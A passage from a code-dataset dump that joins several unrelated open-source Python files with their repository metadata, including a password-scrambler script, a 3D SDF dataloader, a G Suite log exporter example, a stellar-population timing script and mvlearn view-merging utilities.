def new_color_scope(self, color):
return self.ColorScope(self, color)
def _push_color(self, color):
if not self._enable_color:
return
self._colors.append(color)
self._contents.append(str(color))
def _pop_color(self):
if not self._enable_color:
return
self._colors.pop()
self._contents.append(str(self._colors[-1] if self._colors else Color.RESET))
# pylint: disable=protected-access
class ColorScope:
def __init__(self, color_string_builder, color):
self._colored_string_builder = color_string_builder
self._color = color
def __enter__(self):
self._colored_string_builder._push_color(self._color)
def __exit__(self, *args):
self._colored_string_builder._pop_color()
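# --- Usage sketch (not part of the original module) ---
# A minimal, hedged example of how ColoredStringBuilder and its ColorScope
# context manager compose nested colors; all names come from the classes above.
if __name__ == "__main__":
    builder = ColoredStringBuilder(enable_color=True)
    builder.append_line("plain line")
    builder.append("status: ", Color.ORANGE).append_line("attention needed")
    with builder.new_color_scope(Color.BLUE):
        builder.append_line("inside a blue scope")
        builder.append_line("nested purple", Color.PURPLE)  # pops back to blue afterwards
    print(builder.build())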
|
04a5694e003a67ac749d1e13426eea356d291694
|
a960e38868b3a157179bb576ac78b0f144140ed8
|
/PyTorch/examples/custom_op/custom_topk/hpu_custom_op_topk_test.py
|
1145a093a94d152c05ad2b68331f0479e650afdc
|
[] |
no_license
|
HabanaAI/Model-References
|
d339b211adf8be9575ebb1e3bb6afd6cd04312e6
|
3ca77c4a5fb62c60372e8a2839b1fccc3c4e4212
|
refs/heads/master
| 2023-08-17T06:32:28.714253
| 2023-08-14T15:22:08
| 2023-08-14T15:22:08
| 288,377,272
| 108
| 53
| null | 2023-08-18T02:30:16
| 2020-08-18T06:45:50
|
Python
|
UTF-8
|
Python
| false
| false
| 474
|
py
|
hpu_custom_op_topk_test.py
|
import torch
import habana_frameworks.torch.core
def test_custom_topk_op_function(custom_op_lib_path):
torch.ops.load_library(custom_op_lib_path)
print(torch.ops.custom_op.custom_topk)
a_cpu = torch.rand((6, 6))
a_hpu = a_cpu.to('hpu')
a_topk_hpu, a_topk_indices_hpu = torch.ops.custom_op.custom_topk(a_hpu, 3, 1, False)
a_topk_cpu, a_topk_indices_cpu = a_cpu.topk(3, 1)
assert(torch.equal(a_topk_hpu.detach().cpu(), a_topk_cpu.detach().cpu()))
|
9fdadcd130ef824b59b6bcb9263fe7ace917551d
|
77cc80b19d7530eed54b389bc288ed0b7331f49a
|
/passcrambler.py
|
67311bc9742968f15f6d5d0b9112869cd8965f9f
|
[
"BSD-2-Clause"
] |
permissive
|
hasherezade/password_scrambler
|
d976a7dd876f13ca8a7b335c5a51798adeec1143
|
0bb1dd06ee8d7619ef6be69fa962b91e522258d1
|
refs/heads/master
| 2023-01-09T14:55:11.963856
| 2023-01-02T17:52:00
| 2023-01-02T17:52:00
| 42,003,726
| 127
| 44
|
BSD-2-Clause
| 2021-05-26T03:19:48
| 2015-09-06T13:33:37
|
Python
|
UTF-8
|
Python
| false
| false
| 4,183
|
py
|
passcrambler.py
|
#!/usr/bin/env python3
import argparse
import getpass
import base64
import hashlib
import pyperclip
from Crypto.Cipher import AES
# AES:
pad = lambda s: s + (AES.block_size - len(s) % AES.block_size) * chr(AES.block_size - len(s) % AES.block_size).encode()
def aes_encrypt(seed, key, raw):
raw = pad(raw)
iv = seed[0:AES.block_size]
cipher = AES.new(key, AES.MODE_CBC, iv)
return base64.b64encode(iv + cipher.encrypt(raw))
def scramble(key, func='md5'):
    try:
        # AES key must be either 16, 24, or 32 bytes long
        digest = getattr(hashlib, func)(key).digest()
        if len(digest) >= 32:
            return digest[:32]
        elif len(digest) >= 24:
            return digest[:24]
        elif len(digest) >= 16:
            return digest[:16]
        else:
            print(f"[ERROR]: Key length {len(digest)} is too small. Please select a different hash function.")
    except Exception as e:
        print(f"[ERROR]: {e}")
def convert_to_charset(password, specialchars):
output = ""
i = 0
slen = len(specialchars)
for c in password:
c = chr(c)
if c.isalnum():
output += c
else:
output += specialchars[i % slen]
i += 1
return output
def main():
try:
f_choices = sorted(list(hashlib.algorithms_guaranteed))
parser = argparse.ArgumentParser(description="Password scrambler")
parser.add_argument('--file', dest="file", default=None, help="File used to initialize generation",
required=True)
parser.add_argument('--login', dest="login", default=None, help="Login for which you want to use the password",
required=True)
parser.add_argument('--special', dest="special", default="_&#",
help="Whitelist of special characters (e.g. '_&#'), default='_&#'")
parser.add_argument('--length', dest="length", default=30, help="Length of the password, default=30", type=int)
parser.add_argument('--loop', dest="loop", default=1, help="How many times the hashing function will be executed, default=1", type=int)
parser.add_argument('--clip', dest="clip", default=False,
help="Copy the generated password into the clipboard instead of displaying", required=False,
action="store_true")
parser.add_argument('--scramble-func', dest="func", default='md5', choices=f_choices,
help="Hashing function to use for input data scrambling, default=md5")
args = parser.parse_args()
# First thing first, fail if seed file does not exist
with open(args.file, 'rb') as fd:
raw = fd.read()
# get the loop parameter, default to 1 if not set
loop = args.loop if (args.loop > 0) else 1
password = getpass.getpass()
key = password.encode("utf-8")
vec = args.login.encode("utf-8")
for _ in range(loop):
key = scramble(key, args.func)
vec = scramble(vec, args.func)
aes_out1 = aes_encrypt(vec, key, raw)
sha_digest = hashlib.sha512(aes_out1).digest()
passlen = len(password) % len(sha_digest)
key2 = sha_digest[passlen: passlen + 32]
aes_out2 = aes_encrypt(key, key2, aes_out1)
start = key[0] % len(aes_out2)
portion = aes_out2[start:]
result = portion
for x in range(loop):
result = hashlib.sha512(result).digest()
longpass = base64.b64encode(result)
longpass = longpass[0:args.length]
longpass = convert_to_charset(longpass, sorted(args.special, reverse=True))
print("---")
if not args.clip:
print(longpass)
print("---")
else:
pyperclip.copy(longpass)
print("[INFO]: The generated password is in your clipboard.")
except Exception as e:
print(f"[ERROR]: {e}")
if __name__ == "__main__":
main()
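# --- Usage sketch (not part of the original script) ---
# Example invocation (the seed file name is a placeholder):
#   python passcrambler.py --file seed.jpg --login alice@example.com --length 20 --scramble-func sha256
# The helper below illustrates how scramble() derives an AES-compatible key:
# sha256 yields a 32-byte digest, so the full digest can serve as an AES-256 key.
def _demo_scramble():
    key = scramble(b"correct horse battery staple", func="sha256")
    assert key is not None and len(key) == 32
    return key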
|
c8d2feae2e9733fff7340f5951d1b61c8c9f4792
|
ef870111eb0e5403b3bfd07867455a5b4715b683
|
/3D/levelset_data.py
|
541e0e5168e248a3a08dbc76e4952df288430e0a
|
[] |
no_license
|
vsitzmann/metasdf
|
93203b819d4adb375854ea56844f830414295d8f
|
56d0c6e411d23523bd638aa0ad37c0c2c9dbdb9d
|
refs/heads/master
| 2023-02-12T00:16:35.951907
| 2021-01-16T00:25:44
| 2021-01-16T00:25:44
| 293,341,779
| 131
| 15
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,170
|
py
|
levelset_data.py
|
"""
Dataloaders for 3D experiments. Based on code from DeepSDF (Park et al.)
"""
import time
import plyfile
import glob
import logging
import numpy as np
import os
import random
import torch
import torch.utils.data
import trimesh
import skimage.measure
def get_instance_filenames(data_source, split):
npzfiles = []
for dataset in split:
for class_name in split[dataset]:
for instance_name in split[dataset][class_name]:
instance_filename = os.path.join(
dataset, class_name, instance_name + ".npz"
)
#levelset_filename = os.path.splitext(os.path.join(self.data_source, 'SurfaceSamples', self.npyfiles[new_idx]))[0] + '.ply'
#normalization_filename = os.path.join(self.data_source, 'NormalizationParameters', self.npyfiles[new_idx])
if not os.path.isfile(
os.path.join(data_source, 'SdfSamples', instance_filename)
):
continue
if not os.path.isfile(
os.path.join(data_source, 'NormalizationParameters', instance_filename)):
continue
if not os.path.isfile(
os.path.join(data_source, 'SurfaceSamples', os.path.join(dataset, class_name, instance_name + ".ply"))):
continue
npzfiles += [instance_filename]
print(f"Found {len(npzfiles)} files.")
return npzfiles
class NoMeshFileError(RuntimeError):
"""Raised when a mesh file is not found in a shape directory"""
pass
class MultipleMeshFileError(RuntimeError):
""""Raised when a there a multiple mesh files in a shape directory"""
pass
def find_mesh_in_directory(shape_dir):
mesh_filenames = list(glob.iglob(shape_dir + "/**/*.obj")) + list(
glob.iglob(shape_dir + "/*.obj")
)
if len(mesh_filenames) == 0:
raise NoMeshFileError()
elif len(mesh_filenames) > 1:
raise MultipleMeshFileError()
return mesh_filenames[0]
def remove_nans(tensor):
tensor_nan = torch.isnan(tensor[:, 3])
return tensor[~tensor_nan, :]
def load_levelset(levelset_filename, normalization_filename):
normalization_params = np.load(normalization_filename)
unormalized = torch.FloatTensor(trimesh.load(levelset_filename).vertices)
    levelset_tensor = (unormalized + normalization_params['offset']) * normalization_params['scale']  # Old version, works
# levelset_tensor = unormalized * normalization_params['scale'] + normalization_params['offset']
return levelset_tensor
def load_partial(partial_filename, normalization_filename):
normalization_params = np.load(normalization_filename)
unormalized = torch.FloatTensor(trimesh.load(partial_filename).vertices)
partial_tensor = (unormalized + normalization_params['offset']) * normalization_params['scale']
return partial_tensor
def read_sdf_samples_into_ram(sdf_filename, levelset_filename, partial_filename, normalization_params_filename, context_mode):
sdf_npz = np.load(sdf_filename, allow_pickle=True)
pos_tensor = remove_nans(torch.from_numpy(sdf_npz["pos"]))
neg_tensor = remove_nans(torch.from_numpy(sdf_npz["neg"]))
levelset_tensor = torch.zeros((1,))
partial_tensor = torch.zeros((1,))
if context_mode == 'levelset':
levelset_tensor = load_levelset(levelset_filename, normalization_params_filename)
if context_mode == 'partial':
partial_tensor = load_partial(partial_filename, normalization_params_filename)
return [pos_tensor, neg_tensor, levelset_tensor, partial_tensor]
def unpack_sdf_samples(sdf_filename, levelset_filename, partial_filename, normalization_filename, subsampleSDF, subsampleLevelset, context_mode):
npz = np.load(sdf_filename)
pos_tensor = remove_nans(torch.from_numpy(npz["pos"]))
neg_tensor = remove_nans(torch.from_numpy(npz["neg"]))
# split the sample into half
half = int(subsampleSDF / 2)
random_pos = (torch.rand(half) * pos_tensor.shape[0]).long()
random_neg = (torch.rand(half) * neg_tensor.shape[0]).long()
sample_pos = torch.index_select(pos_tensor, 0, random_pos)
sample_neg = torch.index_select(neg_tensor, 0, random_neg)
samples = torch.cat([sample_pos, sample_neg], 0)
if context_mode == 'levelset':
levelset_tensor = load_levelset(levelset_filename, normalization_filename)
context_idcs = np.random.choice(levelset_tensor.shape[0], subsampleLevelset, replace=False)
levelset_points = levelset_tensor[context_idcs]
elif context_mode == 'partial':
levelset_tensor = load_partial(partial_filename, normalization_filename)
context_idcs = np.random.choice(levelset_tensor.shape[0], subsampleLevelset, replace=True)
levelset_points = levelset_tensor[context_idcs]
else:
levelset_points = torch.zeros((1,))
return {'sdf': samples, 'levelset': levelset_points}
def unpack_sdf_samples_from_ram(data, subsampleSDF, subsampleLevelset):
pos_tensor = data[0]
neg_tensor = data[1]
levelset_tensor = data[2]
partial_tensor = data[3]
levelset_points = levelset_tensor
# Subsample Levelset
context_idcs = np.random.choice(levelset_tensor.shape[0], subsampleLevelset, replace=True)
levelset_points = levelset_tensor[context_idcs]
if not subsampleSDF:
subsampleSDF = pos_tensor.shape[0]
# split the sample into half
half = int(subsampleSDF / 2)
random_pos = (torch.rand(half) * pos_tensor.shape[0]).long()
random_neg = (torch.rand(half) * neg_tensor.shape[0]).long()
sample_pos = torch.index_select(pos_tensor, 0, random_pos)
sample_neg = torch.index_select(neg_tensor, 0, random_neg)
samples = torch.cat([sample_pos, sample_neg], 0)
#return samples
return {'sdf': samples, 'levelset': levelset_points, 'partial': partial_tensor}
class LevelsetDataset(torch.utils.data.Dataset):
def __init__(
self,
data_source,
split,
subsampleSDF,
subsampleLevelset,
context_mode,
load_ram=False,
print_filename=False,
num_files=1000000,
):
self.subsampleSDF = subsampleSDF
self.subsampleLevelset = subsampleLevelset
self.context_mode = context_mode
self.data_source = data_source
self.npyfiles = get_instance_filenames(data_source, split)
logging.debug(
"using "
+ str(len(self.npyfiles))
+ " shapes from data source "
+ data_source
)
def __len__(self):
return len(self.npyfiles)
def get_filenames(self, new_idx):
instance_name = os.path.splitext(self.npyfiles[new_idx])[0]#.split('/')[-1]
sdf_filename = os.path.join(self.data_source, 'SdfSamples', self.npyfiles[new_idx])
levelset_filename = os.path.splitext(os.path.join(self.data_source, 'SurfaceSamples', self.npyfiles[new_idx]))[0] + '.ply'
normalization_filename = os.path.join(self.data_source, 'NormalizationParameters', self.npyfiles[new_idx])
partial_filename = os.path.join('/home/ericryanchan/depth_maps', instance_name, 'world_coords.ply')
return sdf_filename, levelset_filename, partial_filename, normalization_filename
def __getitem__(self, idx):
new_idx = idx
while True:
sdf_filename, levelset_filename, partial_filename, normalization_filename = self.get_filenames(new_idx)
try:
return unpack_sdf_samples(sdf_filename, levelset_filename, partial_filename, normalization_filename, self.subsampleSDF, self.subsampleLevelset, self.context_mode), new_idx
except (FileNotFoundError, ValueError) as e:
#print(e)
new_idx = (new_idx + 1) % len(self)
def meta_split(sdf_tensor, levelset_tensor, context_mode):
if context_mode == 'levelset':
xyz = sdf_tensor[:, :, 0:3]
sdf_gt = sdf_tensor[:, :, 3:4]
# Use levelset points, 0's as context; full sdf data as test
meta_data = {'context':(levelset_tensor, torch.zeros(levelset_tensor.shape[0], levelset_tensor.shape[1], 1)),
'query':(xyz, sdf_gt)}
return meta_data
elif context_mode == 'dense':
######## Subsample half of the points as context
context_inputs = []
context_targets = []
test_inputs = []
test_targets = []
batch_size = sdf_tensor.shape[0]
for b in range(batch_size):
idx = torch.randperm(sdf_tensor[b].shape[0]) # shuffle along points dimension
sdf_tensor[b] = sdf_tensor[b][idx]
context_length = sdf_tensor[b].shape[0]//2
context_inputs.append(sdf_tensor[b][:context_length, :3])
context_targets.append(sdf_tensor[b][:context_length, 3:])
test_inputs.append(sdf_tensor[b][context_length:, :3])
test_targets.append(sdf_tensor[b][context_length:, 3:])
context_inputs = torch.stack(context_inputs, dim=0)
context_targets = torch.stack(context_targets, dim=0)
test_inputs = torch.stack(test_inputs, dim=0)
test_targets = torch.stack(test_targets, dim=0)
meta_data = {'context':(context_inputs, context_targets),
'query':(sdf_tensor[:,:,:3], sdf_tensor[:,:,3:])}
return meta_data
#########################
elif context_mode == 'partial': # Same as levelset right now, just loading different points
xyz = sdf_tensor[:, :, 0:3]
sdf_gt = sdf_tensor[:, :, 3:4]
# Use partial points, 0's as context; full sdf data as test
meta_data = {'context':(levelset_tensor, torch.zeros(levelset_tensor.shape[0], levelset_tensor.shape[1], 1)),
'query':(xyz, sdf_gt)}
return meta_data
else:
raise NotImplementedError
def create_samples(N=256, max_batch = 32768, offset=None, scale=None):
# NOTE: the voxel_origin is actually the (bottom, left, down) corner, not the middle
voxel_origin = [-1, -1, -1]
voxel_size = 2.0 / (N - 1)
overall_index = torch.arange(0, N ** 3, 1, out=torch.LongTensor())
samples = torch.zeros(N ** 3, 4)
# transform first 3 columns
# to be the x, y, z index
samples[:, 2] = overall_index % N
samples[:, 1] = (overall_index.float() / N) % N
samples[:, 0] = ((overall_index.float() / N) / N) % N
# transform first 3 columns
# to be the x, y, z coordinate
samples[:, 0] = (samples[:, 0] * voxel_size) + voxel_origin[2]
samples[:, 1] = (samples[:, 1] * voxel_size) + voxel_origin[1]
samples[:, 2] = (samples[:, 2] * voxel_size) + voxel_origin[0]
num_samples = N ** 3
samples.requires_grad = False
return samples
def convert_sdf_samples_to_ply(
pytorch_3d_sdf_tensor,
voxel_grid_origin,
voxel_size,
ply_filename_out,
offset=None,
scale=None,
level=0.0
):
"""
Convert sdf samples to .ply
:param pytorch_3d_sdf_tensor: a torch.FloatTensor of shape (n,n,n)
:voxel_grid_origin: a list of three floats: the bottom, left, down origin of the voxel grid
:voxel_size: float, the size of the voxels
:ply_filename_out: string, path of the filename to save to
This function adapted from: https://github.com/RobotLocomotion/spartan
"""
start_time = time.time()
numpy_3d_sdf_tensor = pytorch_3d_sdf_tensor.numpy()
verts, faces, normals, values = np.zeros((0, 3)), np.zeros((0, 3)), np.zeros((0, 3)), np.zeros(0)
try:
verts, faces, normals, values = skimage.measure.marching_cubes_lewiner(
numpy_3d_sdf_tensor, level=level, spacing=[voxel_size] * 3
)
except:
pass
# transform from voxel coordinates to camera coordinates
# note x and y are flipped in the output of marching_cubes
mesh_points = np.zeros_like(verts)
mesh_points[:, 0] = voxel_grid_origin[0] + verts[:, 0]
mesh_points[:, 1] = voxel_grid_origin[1] + verts[:, 1]
mesh_points[:, 2] = voxel_grid_origin[2] + verts[:, 2]
# apply additional offset and scale
if scale is not None:
mesh_points = mesh_points / scale
if offset is not None:
mesh_points = mesh_points - offset
# try writing to the ply file
num_verts = verts.shape[0]
num_faces = faces.shape[0]
verts_tuple = np.zeros((num_verts,), dtype=[("x", "f4"), ("y", "f4"), ("z", "f4")])
for i in range(0, num_verts):
verts_tuple[i] = tuple(mesh_points[i, :])
faces_building = []
for i in range(0, num_faces):
faces_building.append(((faces[i, :].tolist(),)))
faces_tuple = np.array(faces_building, dtype=[("vertex_indices", "i4", (3,))])
el_verts = plyfile.PlyElement.describe(verts_tuple, "vertex")
el_faces = plyfile.PlyElement.describe(faces_tuple, "face")
ply_data = plyfile.PlyData([el_verts, el_faces])
ply_data.write(ply_filename_out)
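# --- Usage sketch (not part of the original module) ---
# A hedged example of wiring LevelsetDataset into a DataLoader and splitting a
# batch into context/query sets with meta_split. The data_source, split file
# and subsample sizes below are placeholders, not real assets.
def _example_training_loop(data_source="/path/to/data", split_file="/path/to/split.json"):
    import json
    with open(split_file, "r") as f:
        split = json.load(f)
    dataset = LevelsetDataset(
        data_source=data_source,
        split=split,
        subsampleSDF=8000,
        subsampleLevelset=1024,
        context_mode="levelset",
    )
    loader = torch.utils.data.DataLoader(dataset, batch_size=4, shuffle=True)
    for batch, indices in loader:
        meta = meta_split(batch["sdf"], batch["levelset"], context_mode="levelset")
        context_xyz, context_sdf = meta["context"]
        query_xyz, query_sdf = meta["query"]
        break  # one batch is enough for the sketch
    return context_xyz.shape, query_xyz.shape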
|
70d765e66e076ba687d147dfa17a3e7f325085a1
|
61004e474b7b2ad0071c16766f0f7874f04f9466
|
/tools/gsuite-exporter/examples/sync_reports.py
|
8568de97d5eee451fd6fd3c4f0c5c9458a14ea9e
|
[
"Apache-2.0"
] |
permissive
|
GoogleCloudPlatform/professional-services
|
eb79751efae765a8c691a745e520f44f51bd715c
|
0f51121b945bd74c7f667e74e8861fceda87565c
|
refs/heads/main
| 2023-09-05T02:57:33.328973
| 2023-08-30T14:40:30
| 2023-08-30T14:40:30
| 91,730,359
| 2,626
| 1,381
|
Apache-2.0
| 2023-09-14T20:13:42
| 2017-05-18T19:29:27
|
Python
|
UTF-8
|
Python
| false
| false
| 1,001
|
py
|
sync_reports.py
|
# Copyright 2018 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from gsuite_exporter.cli import sync_all
if __name__ == '__main__':
sync_all(
admin_user='<gsuite_admin>@<domain>',
api='reports_v1',
applications=['login', 'admin', 'drive', 'mobile', 'token'],
project_id='<logging_project_id>',
exporter_cls='stackdriver_exporter.StackdriverExporter',
credentials_path=os.environ['GOOGLE_APPLICATION_CREDENTIALS']
)
|
1eca13594e856349816f1e2dcac72b906913deb6
|
73768455b5b4380b37875f7c6588ab989e907dc6
|
/demo/timing.py
|
a130c4db4cdd9711c8b5e318831829da390bb757
|
[
"MIT"
] |
permissive
|
bd-j/prospector
|
5548d4d09d50e5aa5824194d048b698842ee3872
|
5c0255ae828c2b501e66747dcae963fec5e81a8d
|
refs/heads/main
| 2023-09-01T00:26:38.316920
| 2023-08-28T15:41:27
| 2023-08-28T15:41:27
| 10,490,445
| 139
| 73
|
MIT
| 2023-08-04T13:48:12
| 2013-06-04T22:47:00
|
Python
|
UTF-8
|
Python
| false
| false
| 3,522
|
py
|
timing.py
|
from copy import deepcopy
import timeit, time, sys
import numpy as np
import fsps
from prospect.sources import FastStepBasis, CSPBasis
sps = fsps.StellarPopulation(zcontinuous=1)
libs = [l.upper() for l in sps.libraries]
def get_model(sps, **kwargs):
try:
# For SSPBasis derived objects
sps.update(**kwargs)
except(AttributeError):
# For StellarPopulation and CSPBasis objects
        for k, v in kwargs.items():
try:
sps.params[k] = v
except:
pass
out = sps.get_spectrum(tage=sps.params['tage'])
return out
def call_duration(sps, ntry, **params):
# build cached SSPs without getting charged for the time.
junk = [get_model(sps, logzsol=[z], **params) for z in np.linspace(-1, 0, 12)]
#print('done_setup')
ts = time.time()
for i in range(ntry):
_ = get_model(sps, logzsol=[np.random.uniform(-0.8, -0.2)], **params)
dur = time.time() - ts
return dur / ntry
def make_agebins(nbin=5, minage=7.0, **extras):
tuniv = 13.7e9
allages = np.linspace(minage, np.log10(tuniv), nbin)
allages = np.insert(allages, 0, 0.)
agebins = np.array([allages[:-1], allages[1:]]).T
return agebins
if __name__ == "__main__":
step_params = {'agebins':[[]],
'mass': [],
'tage': np.array([13.7]),
'pmetals': np.array([-99])
}
csp_params = {'tage': np.array([10.0]),
'sfh': np.array([4.0]),
'mass': np.array([1.0]),
'pmetals': np.array([-99])
}
w = ['WITHOUT', 'WITH']
ntry = 100
zlist = [1, 2]
nlist = [False, True]
print("Using {} isochrones and {} spectra.\nAsking for single ages.".format(*libs))
# FSPS
string = "StellarPopulation takes {:7.5f}s per call {} nebular emission and zcontinuous={}."
params = deepcopy(csp_params)
for zcont in zlist:
print("\n")
for neb in nlist:
sps = fsps.StellarPopulation(zcontinuous=zcont)
dur = call_duration(sps, ntry, add_neb_emission=[neb], **params)
print(string.format(dur, w[int(neb)], zcont))
# CSP
string = "CSPBasis takes {:7.5f}s per call {} nebular emission and zcontinuous={}."
params = deepcopy(csp_params)
for zcont in zlist:
print("\n")
for neb in nlist:
sps = CSPBasis(zcontinuous=zcont)
dur = call_duration(sps, ntry, add_neb_emission=[neb], **params)
print(string.format(dur, w[int(neb)], zcont))
# Step SFH
nbin = 10
params = deepcopy(step_params)
params['agebins'] = make_agebins(nbin)
params['mass'] = np.ones(nbin) * 1.0
string = "FastStepBasis ({} bins) takes {:7.5f}s per call {} nebular emission and zcontinuous={}."
for zcont in zlist:
print("\n")
for neb in nlist:
sps = FastStepBasis(zcontinuous=zcont)
dur = call_duration(sps, ntry, add_neb_emission=[neb], **params)
#print(sps.params, sps.ssp.params['add_neb_emission'])
print(string.format(nbin, dur, w[int(neb)], zcont))
# sys.exit()
# Now time calls for random Z (which always causes dirtiness=1)
#setup = "from __main__ import test; import numpy as np"
#call = "out=get_model(sps, logzsol=[np.random.uniform(-1, 0)], **params)"
#dur = timeit.timeit(call, setup=setup, number=100)
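# --- Illustrative note (not part of the original script) ---
# make_agebins(nbin) returns an (nbin, 2) array of log-age bin edges running
# from 0 to log10(13.7 Gyr); a quick sanity check, assuming the function above:
def _check_agebins():
    bins = make_agebins(nbin=5)
    assert bins.shape == (5, 2)
    assert bins[0, 0] == 0.0
    assert np.isclose(bins[-1, 1], np.log10(13.7e9))
    return bins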
|
ed1a961247c63899c3c7baeab4371e5e88a55863
|
2b8f195b10e8e12db1252318922668cb432ea8ab
|
/mvlearn/compose/merge.py
|
b01e9499f2c38630bb866f6f7cad50dd12d8634a
|
[
"MIT"
] |
permissive
|
mvlearn/mvlearn
|
70fba0fc52e1467101adadf46cf61e7076838c2f
|
003dccea563926fca5d957f5bbf39c1494acfe94
|
refs/heads/main
| 2023-04-18T15:47:53.716354
| 2022-04-05T22:17:18
| 2022-04-05T22:17:18
| 206,838,300
| 136
| 17
|
MIT
| 2023-03-08T17:37:59
| 2019-09-06T16:56:51
|
Python
|
UTF-8
|
Python
| false
| false
| 7,359
|
py
|
merge.py
|
"""Merging utilities."""
# Authors: Pierre Ablin
#
# License: MIT
import numpy as np
from abc import abstractmethod
from sklearn.base import TransformerMixin
from sklearn.utils.validation import check_is_fitted
from ..utils.utils import check_Xs
class BaseMerger(TransformerMixin):
"""A base class for merging multiview datasets into single view datasets.
The .transform function should return a single dataset.
Parameters
----------
Attributes
----------
See Also
--------
"""
def __init__(self):
pass # pragma: no cover
@abstractmethod
def fit(self, Xs, y=None):
r"""Fit model to multiview data.
Parameters
----------
Xs: list of array-likes
- Xs shape: (n_views,)
- Xs[i] shape: (n_samples, n_features_i)
y : array, shape (n_samples,), optional
Returns
-------
self: returns an instance of self.
"""
return self # pragma: no cover
@abstractmethod
def transform(self, Xs, y=None):
r"""Merge multiview data into a single dataset
Parameters
----------
Xs: list of array-likes
- Xs shape: (n_views,)
- Xs[i] shape: (n_samples, n_features_i)
y : array, shape (n_samples,), optional
Returns
-------
X_transformed : numpy.ndarray of shape (n_samples, n_features)
The singleview output
"""
pass # pragma: no cover
def fit_transform(self, Xs, y=None):
r"""Fit to the data and merge
Parameters
----------
Xs : list of array-likes or numpy.ndarray
- Xs length: n_views
- Xs[i] shape: (n_samples, n_features_i)
y : array, shape (n_samples,), optional
Returns
-------
X_transformed : numpy.ndarray of shape (n_samples, n_features)
The singleview output
"""
return self.fit(Xs, y).transform(Xs)
@abstractmethod
def inverse_transform(self, X):
r"""Take a single view dataset and split it into multiple views.
Parameters
----------
        X : numpy.ndarray, shape (n_samples, n_total_features)
The input dataset
Returns
-------
Xs : list of numpy.ndarray
- Xs length: n_views
- Xs[i] shape: (n_samples, n_features_i)
"""
pass # pragma: no cover
class ConcatMerger(BaseMerger):
r"""A transformer that stacks features of multiview datasets.
Take a multiview dataset and transform it in a single view dataset
by stacking features.
Attributes
----------
n_features_ : list of ints
The number of features in each view of the input dataset
n_total_features_ : int
The number of features in the dataset, equal to the sum of n_features_
n_views_ : int
The number of views in the dataset
See Also
--------
AverageMerger
"""
def __init__(self):
pass
def fit(self, Xs, y=None):
r"""Fit to the data.
Stores the number of features in each view
Parameters
----------
Xs : list of array-likes or numpy.ndarray
- Xs length: n_views
- Xs[i] shape: (n_samples, n_features_i)
y
Ignored
Returns
-------
self : object
Transformer instance.
"""
Xs, n_views, n_samples, n_features = check_Xs(
Xs, return_dimensions=True
)
self.n_features_ = n_features
self.n_total_features_ = sum(self.n_features_)
self.n_views_ = n_views
return self
def transform(self, Xs, y=None):
r"""Merge the data by stacking its features.
The multiple views are transformed into a single view dataset by
stacking (i.e. concatenating) the features.
Parameters
----------
Xs : list of array-likes or numpy.ndarray
- Xs length: n_views
- Xs[i] shape: (n_samples, n_features_i)
y
Ignored
Returns
-------
        X_transformed : numpy.ndarray of shape (n_samples, n_total_features)
The stacked data, containing all the stacked features.
"""
Xs = check_Xs(Xs)
return np.hstack(Xs)
def inverse_transform(self, X):
r"""Take a single view dataset and split it into multiple views.
The input dimension must match the fitted dimension of the multiview
dataset.
Parameters
----------
        X : numpy.ndarray, shape (n_samples, n_total_features)
The input dataset
Returns
-------
Xs : list of numpy.ndarray
- Xs length: n_views
- Xs[i] shape: (n_samples, n_features_i)
The multiview dataset obtained by splitting features of X
"""
check_is_fitted(self)
n_feature = X.shape[1]
if n_feature != self.n_total_features_:
raise ValueError(
"The number of features in the input array ({}) does not match"
" the total number of features in the multiview dataset"
" ({})".format(n_feature, self.n_total_features_)
)
return np.split(X, np.cumsum(self.n_features_)[:-1], axis=1)
class AverageMerger(BaseMerger):
r"""A transformer that computes the mean of multiview datasets
Take a multiview dataset and transform it in a single view dataset
by averaging across views
Attributes
----------
    n_feature_ : int
        The number of features in each view of the input dataset.
        Must be the same for each view.
n_views_ : int
The number of views in the dataset
See Also
--------
ConcatMerger
"""
def __init__(self):
pass
def fit(self, Xs, y=None):
r"""Fit to the data.
Stores the number of features in each view, and checks that
each view has the same number of features.
Parameters
----------
Xs : list of array-likes or numpy.ndarray
- Xs length: n_views
- Xs[i] shape: (n_samples, n_features_i)
y
Ignored
Returns
-------
self : object
Transformer instance.
"""
Xs = check_Xs(Xs)
n_features_ = [X.shape[1] for X in Xs]
if len(set(n_features_)) > 1:
raise ValueError(
"The number of features in each dataset should be the same."
)
self.n_feature_ = n_features_[0]
self.n_views_ = len(n_features_)
return self
def transform(self, Xs, y=None):
r"""Merge the views by averaging
Transform the multiview dataset into a single view by averaging
the views
Parameters
----------
Xs : list of array-likes or numpy.ndarray
- Xs length: n_views
- Xs[i] shape: (n_samples, n_features_i)
y
Ignored
Returns
-------
        X_transformed : numpy.ndarray of shape (n_samples, n_features)
The average of the views.
"""
Xs = check_Xs(Xs)
return np.mean(Xs, axis=0)
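# --- Usage sketch (not part of the original module) ---
# A minimal, hedged example: ConcatMerger stacks view features column-wise and
# can split them back, while AverageMerger averages views of equal width.
# The toy arrays below are illustrative only.
def _example_usage():
    Xs = [np.arange(6).reshape(3, 2), np.arange(9).reshape(3, 3)]
    concat = ConcatMerger().fit(Xs)
    X_single = concat.transform(Xs)                # shape (3, 5)
    Xs_back = concat.inverse_transform(X_single)   # two views again
    assert all(np.array_equal(a, b) for a, b in zip(Xs, Xs_back))
    same_width = [np.ones((3, 2)), 3 * np.ones((3, 2))]
    X_avg = AverageMerger().fit(same_width).transform(same_width)  # all entries 2.0
    return X_single, X_avg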
|
b1d46011f78b36fd71f4f1bdb718bd75053db64a
|
45e376ae66b78b17788b1d3575b334b2cb1d0b1c
|
/tests/terraform/checks/resource/gcp/test_GoogleProjectAdminServiceAccount.py
|
37fd4a8a48bd986aa7b83832e8af4673cb9b5635
|
[
"Apache-2.0"
] |
permissive
|
bridgecrewio/checkov
|
aeb8febed2ed90e61d5755f8f9d80b125362644d
|
e64cbd27ffb6f09c2c9f081b45b7a821a3aa1a4d
|
refs/heads/main
| 2023-08-31T06:57:21.990147
| 2023-08-30T23:01:47
| 2023-08-30T23:01:47
| 224,386,599
| 5,929
| 1,056
|
Apache-2.0
| 2023-09-14T20:10:23
| 2019-11-27T08:55:14
|
Python
|
